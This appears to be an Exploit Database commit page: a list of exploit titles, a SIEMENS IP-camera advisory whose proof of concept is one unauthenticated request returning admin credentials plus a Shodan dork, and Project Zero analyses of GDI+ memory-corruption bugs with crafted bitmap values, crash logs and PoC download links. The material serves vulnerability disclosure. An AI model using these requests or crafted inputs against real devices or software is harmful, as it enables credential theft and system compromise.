AutoHTML Module Local File Inclusion PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion Reporter 1.0 Mambo Component Reporter.sql.php Remote File Inclusion Reporter 1.0 Mambo Component - Reporter.sql.php Remote File Inclusion Mambo Rssxt Component 1.0 MosConfig_absolute_path Multiple Remote File Inclusion Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Inclusion Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion Mambo/Joomla Com_comprofiler 1.0 Plugin.class.php Remote File Inclusion Mambo/Joomla Com_comprofiler 1.0 Plugin.- class.php Remote File Inclusion PHP-Proxima 6.0 BB_Smilies.php Local File Inclusion PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion Hitweb 3.0 REP_CLASS Multiple Remote File Inclusion Hitweb 3.0 - REP_CLASS Multiple Remote File Inclusion php_news 2.0 user_user.php language Parameter Remote File Inclusion php_news 2.0 admin/news.php language Parameter Remote File Inclusion php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion php_news 2.0 creat_news_all.php language Parameter Remote File Inclusion php_news 2.0 - user_user.php language Parameter Remote File Inclusion php_news 2.0 - admin/news.php language Parameter Remote File Inclusion php_news 2.0 - admin/catagory.php language Parameter Remote File Inclusion php_news 2.0 - creat_news_all.php language Parameter Remote File Inclusion CommunityPortals 1.0 Bug.php Remote File Inclusion CommunityPortals 1.0 - Bug.php Remote File Inclusion PHPTreeView 1.0 TreeViewClass.php Remote File Inclusion PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion NewP News Publishing System 1.0 Class.Database.php Remote File Inclusion NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion Boonex 2.0 Dolphin Index.php Remote File Inclusion Boonex 2.0 Dolphin - Index.php Remote File Inclusion Apple Mac OS X 10.4.8 UDIF Disk Image Remote Denial of Service Apple Mac OS X 10.4.8 -UDIF Disk Image Remote Denial of Service Apple Mac OS X 10.4.8 UDTO Disk Image Remote Denial of Service Apple Mac OS X 10.4.8 - UDTO Disk Image Remote Denial of Service eCardMAX HotEditor 4.0 Keyboard.php Local File Inclusion eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion Comus 2.0 Accept.php Remote File Inclusion Comus 2.0 - Accept.php Remote File Inclusion Active PHP Bookmarks 1.0 APB.php Remote File Inclusion Active PHP Bookmarks 1.0 - APB.php Remote File Inclusion ABC Excel Parser Pro 4.0 Parser_Path Remote File Inclusion ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion PHP-Nuke 8.0 autohtml.php Local File Inclusion PHP-Nuke 8.0 - autohtml.php Local File Inclusion Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Drupal Ajax Checklist 5.x-1.0 Module - Multiple SQL Injection EagleGet 1.1.8.1 - Denial of Service Exploit EagleGet 1.1.8.1 - Denial of Service Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module SQL Injection Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection Jeebles Technology Jeebles Directory 2.9.60 Download.php Local File Inclusion Jeebles Technology Jeebles Directory 2.9.60 - Download.php Local File Inclusion CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Phpbasic basicFramework 1.0 Includes.php Remote File Inclusion CodeWidgets Web Based Alpha Tabbed Address Book - Index.ASP SQL Injection Phpbasic basicFramework 1.0 - Includes.php Remote File Inclusion Download Management 1.00 for PHP-Fusion Multiple Local File Inclusion Download Management 1.00 for PHP-Fusion - Multiple Local File Inclusion PlutoStatus Locator 1.0pre alpha 'index.php' Local File Inclusion PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion Microsoft Internet Explorer 7/8 Beta 1 Frame Location Cross Domain Security Bypass Microsoft Internet Explorer 7/8 Beta 1 - Frame Location Cross Domain Security Bypass miniBB RSS 2.0 Plugin Multiple Remote File Inclusion miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion phpKF-Portal 1.10 - baslik.php tema_dizin Parameter Traversal Local File Inclusion phpKF-Portal 1.10 - anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion Couchdb 1.5.0 - uuids DoS Exploit Couchdb 1.5.0 - uuids Denial of Service CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass ZTE and TP-Link RomPager - DoS Exploit ZTE and TP-Link RomPager - Denial of Service C99Shell 1.0 pre-release buil 'Ch99.php' Cross-Site Scripting C99Shell 1.0 pre-release build 16 - 'Ch99.php' Cross-Site Scripting Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access Percha Gallery Component 1.6 Beta for Joomla! - index.php controller Parameter Traversal Arbitrary File Access log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Inclusion log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion Miniwork Studio Canteen 1.0 Component for Joomla! SQL Injection and Local File Inclusion Miniwork Studio Canteen 1.0 Component for Joomla! - SQL Injection / Local File Inclusion CMS Made Simple Download Manager 1.4.1 Module Arbitrary File Upload CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload TWiki 5.0 bin/view rev Parameter XSS TWiki 5.0 - bin/view rev Parameter XSS slickMsg 0.7-alpha 'top.php' Cross-Site Scripting slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting Drupal CAPTCHA Module Security Bypass Drupal CAPTCHA Module - Security Bypass WordPress 4.0 - Denial of Service Exploit WordPress 4.0 - Denial of Service Cradlepoint MBR1400 and MBR1200 Local File Inclusion Cradlepoint MBR1400 and MBR1200 - Local File Inclusion mIRC 'projects.php' Cross-Site Scripting mIRC - 'projects.php' Cross-Site Scripting Apache 'mod_wsgi' Module Information Disclosure Apache 'mod_wsgi' Module - Information Disclosure Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040) Microsoft Windows 7 (x64) - afd.sys Privilege Escalation (MS14-040) SIEMENS IP-Camera CVMS2025-IR_ CCMS2025 - Credentials Disclosure Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097) Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097) Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap-Based Buffer Overflow (MS16-097)
This commit is contained in:
Offensive Security
parent
edb6b2e39f
commit
5be2377b41
5 changed files with 1164 additions and 792 deletions
60
platforms/cgi/webapps/40254.txt
Executable file
60
platforms/cgi/webapps/40254.txt
Executable file
|
|
@ -0,0 +1,60 @@
|
|||
1. Advisory Information
|
||||
========================================
|
||||
Title : SIEMENS IP-Camera Unauthenticated Remote Credentials Disclosure
|
||||
Vendor Homepage : https://www.siemens.com
|
||||
Remotely Exploitable : Yes
|
||||
Versions Affected : x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
|
||||
Tested on Camera types : CVMS2025-IR, CCMS2025 (Camera type)
|
||||
Reference for CCMS2025 : https://w5.siemens.com/web/cz/cz/corporate/portal/home/produkty_a_sluzby/IBT/pozarni_a_bezpecnostni_systemy/cctv/ip_kamery/Documents/023_CCIS1425_A6V10333969_en.doc.pdf
|
||||
Vulnerability : Username / Password Disclosure (Critical/High)
|
||||
Shodan Dork : title:"SIEMENS IP-Camera"
|
||||
Date : 16/08/2016
|
||||
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
|
||||
|
||||
2. CREDIT
|
||||
========================================
|
||||
This vulnerability was identified during penetration test by Yakir Wizman.
|
||||
|
||||
|
||||
3. Description
|
||||
========================================
|
||||
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
|
||||
|
||||
|
||||
4. Proof-of-Concept:
|
||||
========================================
|
||||
Simply go to the following url:
|
||||
http://host:port/cgi-bin/readfile.cgi?query=ADMINID
|
||||
|
||||
Should return some javascript variable which contain the credentials and other configuration vars:
|
||||
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0";
|
||||
|
||||
|
||||
Request:
|
||||
----------
|
||||
GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
|
||||
Host: host:port
|
||||
Connection: close
|
||||
|
||||
|
||||
Response:
|
||||
----------
|
||||
HTTP/1.0 200 OK
|
||||
Connection: close
|
||||
Content-type: text/html
|
||||
|
||||
var Adm_ID="admin";
|
||||
var Adm_Pass1=“admin”;
|
||||
var Adm_Pass2=“admin”;
|
||||
var Language=“en”;
|
||||
var Logoff_Time="0";
|
||||
|
||||
|
||||
|
||||
Login @ http://host:port/cgi-bin/chklogin.cgi
|
||||
|
||||
|
||||
5. SOLUTION
|
||||
========================================
|
||||
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
|
||||
102
platforms/windows/dos/40255.txt
Executable file
102
platforms/windows/dos/40255.txt
Executable file
|
|
@ -0,0 +1,102 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=824
|
||||
|
||||
The GDI+ library can handle bitmaps originating from untrusted sources through a variety of attack vectors, like EMF files, which may embed bitmaps in records such as EMR_PLGBLT, EMR_BITBLT, EMR_STRETCHBLT, EMR_STRETCHDIBITS etc. The GDI+ implementation supports bitmaps compressed with the BI_RLE8 (8-bit Run-Length Encoding) compression algorithm, and performs the actual decompression in the gdiplus!DecodeCompressedRLEBitmap function.
|
||||
|
||||
In a simplified scheme of things, let's introduce the following symbols, as they are calculated by GDI+ (all arithmetic is performed on signed 32-bit types):
|
||||
|
||||
columns = abs(biHeight)
|
||||
bytes_per_row = abs(biWidth * (((biPlanes * biBitCount + 31) & 0xFFFFFFE0) / 8))
|
||||
|
||||
The output buffer used to store the decompressed bitmap is allocated from the heap and has a size of columns * bytes_per_row, which means the bitmap has a high degree of control over the buffer's length. One of the supported RLE escape codes is "End of Line", implemented as follows:
|
||||
|
||||
--- cut ---
|
||||
out_ptr += bytes_per_row;
|
||||
if (out_ptr > output_buffer_end) {
|
||||
// Bail out.
|
||||
}
|
||||
--- cut ---
|
||||
|
||||
The above construct seems correct at a first glance, and indeed works fine on 64-bit platforms. However, in 32-bit Large Address Aware programs which can utilize the full 32-bit address space, the "out_ptr += bytes_per_row" expression may overflow the upper address space bound (0xFFFFFFFF), which will subsequently make the "out_ptr" pointer contain a completely invalid address, while still passing the "out_ptr > output_buffer_end" sanity check.
|
||||
|
||||
Here's an example:
|
||||
|
||||
biWidth = 0x05900000
|
||||
biHeight = 0x00000017
|
||||
biPlanes = 0x0001
|
||||
biBitCount = 0x0008
|
||||
|
||||
As a result, columns = 0x17, bytes_per_row = 0x590000 and the output buffer size is 0x7ff00000. In my test application, the buffer is allocated at address 0x7fff0020, and it ends at 0xffef0020. If we then encode the bitmap as:
|
||||
|
||||
End of Line \
|
||||
End of Line |
|
||||
End of Line | 24 times
|
||||
... |
|
||||
End of Line /
|
||||
Repeat the 0xcc bytes 255 times.
|
||||
|
||||
Or in binary:
|
||||
|
||||
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFCC
|
||||
|
||||
Then the out_ptr pointer will change as follows:
|
||||
|
||||
7fff0020
|
||||
858f0020
|
||||
8b1f0020
|
||||
...
|
||||
ffef0020
|
||||
057f0020
|
||||
|
||||
As you can see, the address has passed the sanity checks at all stages, and now that it is out of the allocation's bounds, an attempt to write any data will result in a crash:
|
||||
|
||||
--- cut ---
|
||||
(3434.194): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=0011015e ebx=ffef0020 ecx=000000fe edx=057f01cc esi=057f0020 edi=0011a6f0
|
||||
eip=6b090e5a esp=0037f290 ebp=0037f2ac iopl=0 nv up ei pl nz na pe cy
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
|
||||
gdiplus!DecodeCompressedRLEBitmap+0x195:
|
||||
6b090e5a 8816 mov byte ptr [esi],dl ds:002b:057f0020=??
|
||||
0:000> ? dl
|
||||
Evaluate expression: 204 = 000000cc
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
0037f2ac 6b091124 057f0020 cc11012c 0037f2cc gdiplus!DecodeCompressedRLEBitmap+0x195
|
||||
0037f6f4 6b092c7a 001100f8 0011012c 00000000 gdiplus!CopyOnWriteBitmap::CopyOnWriteBitmap+0x96
|
||||
0037f708 6b0932cc 001100f8 0011012c 00000000 gdiplus!CopyOnWriteBitmap::Create+0x23
|
||||
0037f720 6b0c1e8b 001100f8 0011012c 00000000 gdiplus!GpBitmap::GpBitmap+0x32
|
||||
0037f804 6b0c7ed1 0000004f 00143a30 0000a67c gdiplus!CEmfPlusEnumState::PlgBlt+0x92
|
||||
0037f818 6b0986ca 0000004f 0000a67c 00110074 gdiplus!CEmfPlusEnumState::ProcessRecord+0xe7
|
||||
0037f834 6b098862 0000004f 00000000 0000a67c gdiplus!GdipPlayMetafileRecordCallback+0x6c
|
||||
0037f85c 773955ec 472127aa 0047d798 00110074 gdiplus!EnumEmfDownLevel+0x6e
|
||||
0037f8e8 6b09aa36 472127aa 403581b3 6b0987f4 GDI32!bInternalPlayEMF+0x6a3
|
||||
0037f920 6b09d199 472127aa 54461fd1 0137f98c gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
|
||||
0037f9c8 6b09f455 00000000 54461fd1 0037faf0 gdiplus!GpGraphics::EnumEmf+0x391
|
||||
0037fb28 6b0a4742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
|
||||
0037fc24 6b0a47c6 00143228 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
|
||||
0037fc88 6b09c792 00143228 0037fcfc 0037fcfc gdiplus!GpGraphics::DrawImage+0x51
|
||||
0037fcc0 6b09ea7a 00143228 0037fcfc 00000005 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
|
||||
0037fd14 6b09f4d5 00142f10 0037fda0 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
|
||||
0037fd38 6b074f71 00142f10 0037fda0 00000005 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
|
||||
0037fd74 0118117e 00142f10 00143228 0037fda0 gdiplus!GdipConvertToEmfPlus+0xbf
|
||||
...
|
||||
--- cut ---
|
||||
|
||||
The issue has been reproduced with a C++ program built with Microsoft Visual Studio 2013 for the x86 platform and with the /LARGEADDRESSAWARE flag set, which boils down to the following code:
|
||||
|
||||
--- cut ---
|
||||
Graphics graphics(hdc);
|
||||
Metafile *mf = new Metafile(L"C:\\path\\to\\poc.emf");
|
||||
|
||||
INT conversionSuccess;
|
||||
mf->ConvertToEmfPlus(&graphics, &conversionSuccess, Gdiplus::EmfTypeEmfPlusDual, NULL);
|
||||
--- cut ---
|
||||
|
||||
The poc.emf file is attached. The reproducibility of the crash using the specific testcase is obviously highly dependent on the state of the process address space while loading the image, so poc.emf might not necessarily lead to a crash of a GDI+ client other than the test program (such as Microsoft Office).
|
||||
|
||||
The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40255.zip
|
||||
84
platforms/windows/dos/40256.txt
Executable file
84
platforms/windows/dos/40256.txt
Executable file
|
|
@ -0,0 +1,84 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=826
|
||||
|
||||
|
||||
The GDI+ library can handle bitmaps originating from untrusted sources through a variety of attack vectors, like EMF files, which may embed bitmaps in records such as EMR_PLGBLT, EMR_BITBLT, EMR_STRETCHBLT, EMR_STRETCHDIBITS etc.
|
||||
|
||||
In a simplified scheme of things, let's introduce the following symbols, as they are calculated by GDI+ (all arithmetic is performed on signed 32-bit types):
|
||||
|
||||
columns = abs(biHeight)
|
||||
bytes_per_row_signed = biWidth * (((biPlanes * biBitCount + 31) & 0xFFFFFFE0) / 8)
|
||||
|
||||
While the gdiplus!ValidateBitmapInfo attempts to validate the correctness of the bitmap headers to some degree, it also fills out portions of a structure which is later used to display the bitmap or perform any other operations on the image. One of them is a pointer to the first row of pixels, calculated depending on the signedness of the biHeight field, which indicates if the bitmap is encoded upside-down or not. This is illustrated by the following pseudo-code snippet:
|
||||
|
||||
--- cut ---
|
||||
if (biHeight > 0) {
|
||||
first_row = &pixels_buffer[bytes_per_row_signed * (biHeight - 1)];
|
||||
} else {
|
||||
first_row = pixels_buffer;
|
||||
}
|
||||
--- cut ---
|
||||
|
||||
Even though there are some dependencies between the various fields that must be met, the attacker still has almost full control over the values of both bytes_per_row_signed and biHeight. If the bytes_per_row_signed variable holds a negative value and biHeight is larger than 1, then we can get the first_row pointer to point at a nearly arbitrary location relative to the address of pixels_buffer.
|
||||
|
||||
The exploitation of this bug is additionally facilitated by a flaw in the gdiplus!GetBitmapFromRecord function, which is supposed to check that the EMF record is sufficiently large to fully contain the bitmap data, and is called at the beginning of the BMP-related EMF record handlers, before any BMP parsing actually takes place. The most interesting expression is as follows:
|
||||
|
||||
--- cut ---
|
||||
if (record_length - bitmap_data_offset >= GetDibBitsSize(&header)) {
|
||||
return TRUE;
|
||||
}
|
||||
return FALSE;
|
||||
--- cut ---
|
||||
|
||||
The above check appears to be effective at a first glance, but it turns out that the GetDibBitsSize() function returns 0 if there are any problems detected in the headers, including invalid values in specific fields (biWidth, biHeight, ...), integer overflows etc. As a result, contrary to intuition, a malformed header will cause the above check to automatically pass, opening up the potential for bugs such as the one discussed in this report further in the bitmap handling code.
|
||||
|
||||
A poc.emf file is attached. It has been confirmed to crash both x86 and x64 builds of a test EMF viewer written in C++, and Microsoft Office 2013. It uses an EMR_PLGBLT record with a malformed, embedded bitmap and the following fields:
|
||||
|
||||
biWidth = 0x30000000
|
||||
biHeight = 0x00000002
|
||||
biPlanes = 0x0001
|
||||
biBitCount = 0x0008
|
||||
|
||||
The above combination of values will lead to GetDibBitsSize() returning 0, bytes_per_row_signed holding a negative value, and the first_row pointer addressing an invalid address lower than the actual buffer:
|
||||
|
||||
--- cut ---
|
||||
(4144.1e30): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=f046faf4 ebx=0000fdec ecx=00003e72 edx=00000000 esi=f046012c edi=07c7d624
|
||||
eip=75969b60 esp=0034ec88 ebp=0034ec90 iopl=0 nv up ei pl nz ac pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210216
|
||||
msvcrt!memcpy+0x5a:
|
||||
75969b60 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
0034ec90 6b0a5bd3 07c7d624 f046012c 0000f9c8 msvcrt!memcpy+0x5a
|
||||
0034ecb0 6b09780d 07c7d1e0 f046012c 20000000 gdiplus!EmfPlusCommentStream::Write+0x9e
|
||||
0034f584 6b098180 07c7d1e0 00000002 08be4cd8 gdiplus!CopyOnWriteBitmap::GetData+0x3f3
|
||||
0034f59c 6b0a6029 07c7d1e0 00000002 08be4cd8 gdiplus!GpBitmap::GetData+0x1c
|
||||
0034f5b4 6b0a8a55 00000005 08be4cd8 00000000 gdiplus!MetafileRecorder::WriteObject+0x49
|
||||
0034f5d8 6b0a7814 07c7badc 0034f730 07c90d28 gdiplus!MetafileRecorder::RecordObject+0x57
|
||||
0034f720 6b0a453d 0034f7f8 08be4cd8 00000000 gdiplus!MetafileRecorder::RecordDrawImage+0x93
|
||||
0034f818 6b0a4838 08be4cd8 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x1f0
|
||||
0034f87c 6b0c205d 08be4cd8 0034f918 00000003 gdiplus!GpGraphics::DrawImage+0x66
|
||||
0034f96c 6b0c7ed1 0000004f 07c94cb0 0000a67c gdiplus!CEmfPlusEnumState::PlgBlt+0x264
|
||||
0034f980 6b0986ca 0000004f 0000a67c 00460074 gdiplus!CEmfPlusEnumState::ProcessRecord+0xe7
|
||||
0034f99c 6b098862 0000004f 00000000 0000a67c gdiplus!GdipPlayMetafileRecordCallback+0x6c
|
||||
0034f9c4 773955ec 7021208b 05d56ff8 00460074 gdiplus!EnumEmfDownLevel+0x6e
|
||||
0034fa50 6b09aa36 7021208b 403581b3 6b0987f4 GDI32!bInternalPlayEMF+0x6a3
|
||||
0034fa88 6b09d199 7021208b 5e461f1b 0134faf4 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
|
||||
0034fb30 6b09f455 00000000 5e461f1b 0034fc58 gdiplus!GpGraphics::EnumEmf+0x391
|
||||
0034fc90 6b0a4742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
|
||||
0034fd8c 6b0a47c6 07c75f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
|
||||
0034fdf0 6b09c792 07c75f28 0034fe64 0034fe64 gdiplus!GpGraphics::DrawImage+0x51
|
||||
0034fe28 6b09ea7a 07c75f28 0034fe64 00000005 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
|
||||
0034fe7c 6b09f4d5 07c71d28 0034ff08 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
|
||||
0034fea0 6b074f71 07c71d28 0034ff08 00000005 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
|
||||
0034fedc 010c117e 07c71d28 07c75f28 0034ff08 gdiplus!GdipConvertToEmfPlus+0xbf
|
||||
...
|
||||
--- cut ---
|
||||
|
||||
The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40256.zip
|
||||
122
platforms/windows/dos/40257.txt
Executable file
122
platforms/windows/dos/40257.txt
Executable file
|
|
@ -0,0 +1,122 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=828
|
||||
|
||||
The Microsoft GDI+ implementation of the EMF format supports records corresponding to the ExtTextOutA() and PolyTextOutA() API functions. Both CEmfPlusEnumState::ExtTextOutA and CEmfPlusEnumState::PolyTextOutA handlers suffer from a security vulnerability in the handling of the "offDx" record field, which is described in the following way in the format specification:
|
||||
|
||||
--- cut ---
|
||||
offDx (4 bytes): A 32-bit unsigned integer that specifies the offset to an intercharacter spacing
|
||||
array, in bytes, from the start of the record in which this object is contained. This value MUST be
|
||||
32-bit aligned.
|
||||
--- cut ---
|
||||
|
||||
The offset is supposed to address an array of "Chars" (another field in the text records, specifying the number of characters to be displayed) double words, taking up a total of 4 * N bytes. However, instead of verifying that the provided record is sufficiently large to contain 4 * N bytes at the specified offset, it only checks if it can fit 4 bytes (completely ignoring the actual number of characters in the message, which can be larger than 1). A pseudo-code of the current, vulnerable code is shown below:
|
||||
|
||||
--- cut ---
|
||||
if ( record_size - offString >= nChars && (!nChars || record_size - 4 >= record->emrtext.offDx) ) {
|
||||
// Validation passed, continue processing the record.
|
||||
}
|
||||
--- cut ---
|
||||
|
||||
There is definitely a flaw in the implementation, but one which would typically only lead to an out-of-bound read condition, since it's a problem with the sanitization of an input buffer. However, the logic found in the remainder of the function is as follows:
|
||||
|
||||
- Attempt to convert the textual ANSI string in the record to a wide-char string, using the MultiByteToWideChar() function and the code page specified in the most recently selected font.
|
||||
- If the number of characters converted is equal to the number of bytes in the input buffer, CEmfPlusEnumState::PlayExtTextOut() is called and the function returns.
|
||||
- Otherwise, the function proceeds to rewrite the offDx buffer by calling EmfEnumState::CreateCopyOfCurrentRecord() to allocate an exact copy of the current record (with the same size), and then copying entries of the intercharacter spacing array, omitting those corresponding to bytes which cause the IsDBCSLeadByteEx() function to return true. Once the rewriting is performed, CEmfPlusEnumState::PlayExtTextOut() is called with the new record as the parameter.
|
||||
|
||||
In order to trigger the more interesting array rewriting behavior, we must get the MultiByteToWideChar() function to convert fewer characters than there are bytes in the input buffer, which means we have to utilize a string in a non-standard encoding, which supports double-byte character sets (DBCS). Luckily, this is possible by selecting a font with an appropriate charset (e.g. SHIFTJIS_CHARSET) into the HDC, and invoking either of the *TextOutA() handlers with a byte stream containing so-called lead bytes (which folds two bytes into a single character, decreasing the eventual return value of the MultiByteToWideChar() call).
|
||||
|
||||
Since the spacing array in the new record is too small to store entries for all "Chars" characters, it is overflown with data read from memory after the original record buffer. Considering the complexity of the EMF format, other records in the picture file could be easily used to massage the heap such that the record copy is overflown with fully controlled data. The issue has been reproduced in Microsoft Office 2013, as well as a simple C++ program which boils down to the following calls:
|
||||
|
||||
--- cut ---
|
||||
Graphics graphics(hdc);
|
||||
Metafile *mf = new Metafile(L"C:\\path\\to\\poc.emf");
|
||||
|
||||
INT conversionSuccess;
|
||||
mf->ConvertToEmfPlus(&graphics, &conversionSuccess, Gdiplus::EmfTypeEmfPlusDual, NULL);
|
||||
--- cut ---
|
||||
|
||||
An example crash log from PowerPoint 2013, indicating heap corruption, is shown below (the condition can also be reproduced reliably by enabling Page Heap on the GDI+ client process):
|
||||
|
||||
--- cut ---
|
||||
(2a8c.2bd8): Break instruction exception - code 80000003 (first chance)
|
||||
eax=00000000 ebx=00000000 ecx=772336ab edx=0022cb85 esi=03bd0000 edi=1171ffc0
|
||||
eip=7728e815 esp=0022cdd8 ebp=0022ce50 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
|
||||
ntdll!RtlReportCriticalFailure+0x29:
|
||||
7728e815 cc int 3
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
0022ce50 7728f749 c0000374 772c4270 0022ce94 ntdll!RtlReportCriticalFailure+0x29
|
||||
0022ce60 7728f829 00000002 64dc1326 03bd0000 ntdll!RtlpReportHeapFailure+0x21
|
||||
0022ce94 7724ab46 0000000c 03bd0000 1171ffc0 ntdll!RtlpLogHeapFailure+0xa1
|
||||
0022cf84 771f3431 00000258 00000260 03bd00c4 ntdll!RtlpAllocateHeap+0x7b2
|
||||
0022d008 695071ec 03bd0000 00000000 00000258 ntdll!RtlAllocateHeap+0x23a
|
||||
0022d01c 6951bbf1 00000258 116b5104 03bdd558 gdiplus!GpMalloc+0x16
|
||||
0022d030 69557185 116b50e0 116b50e0 03bdd558 gdiplus!GpGraphics::Save+0x11
|
||||
0022d4b0 69557bdc 116b50e0 116b5104 116b30d8 gdiplus!CEmfPlusEnumState::PlayExtTextOut+0xda
|
||||
0022d4ec 69557f25 00000053 03bdae00 00006044 gdiplus!CEmfPlusEnumState::ExtTextOutA+0x136
|
||||
0022d500 695286ca 00000053 00006044 0d67b568 gdiplus!CEmfPlusEnumState::ProcessRecord+0x13b
|
||||
0022d51c 69528862 00000053 00000000 00006044 gdiplus!GdipPlayMetafileRecordCallback+0x6c
|
||||
0022d544 768155f4 9d211b17 0d567180 0d67b568 gdiplus!EnumEmfDownLevel+0x6e
|
||||
0022d5d0 6952aa36 9d211b17 403581b3 695287f4 GDI32!bInternalPlayEMF+0x6a3
|
||||
0022d608 6952d199 9d211b17 05462305 0122d674 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
|
||||
0022d6b0 6952f455 00000000 05462305 0022d7d8 gdiplus!GpGraphics::EnumEmf+0x391
|
||||
0022d810 69534742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
|
||||
0022d90c 695347c6 03bd2fd8 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
|
||||
0022d970 6952c792 03bd2fd8 0022d9e4 0022d9e4 gdiplus!GpGraphics::DrawImage+0x51
|
||||
0022d9a8 6952ea7a 03bd2fd8 0022d9e4 00000004 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
|
||||
0022d9fc 6952f4d5 03bdc438 0022dadc 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
|
||||
0022da20 69504f71 03bdc438 0022dadc 00000004 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
|
||||
0022da5c 54793044 03bdc438 03bd2fd8 0022dadc gdiplus!GdipConvertToEmfPlus+0xbf
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0022daf0 548c7b8d 00000000 03bdc438 b93aea31 oart!Ordinal3385+0x7e8
|
||||
0022df18 548c749b 0022e3a4 094c4380 0022e18c oart!Ordinal655+0x874
|
||||
0022e12c 54793cbb 0022e3a4 094c4380 0022e18c oart!Ordinal655+0x182
|
||||
0022e1c0 546bf722 0022e3a4 094c4380 00000000 oart!Ordinal5891+0xad1
|
||||
0022e200 5474987d 0022e3a4 0d4f7f34 0022e2ec oart!Ordinal3910+0xfd6
|
||||
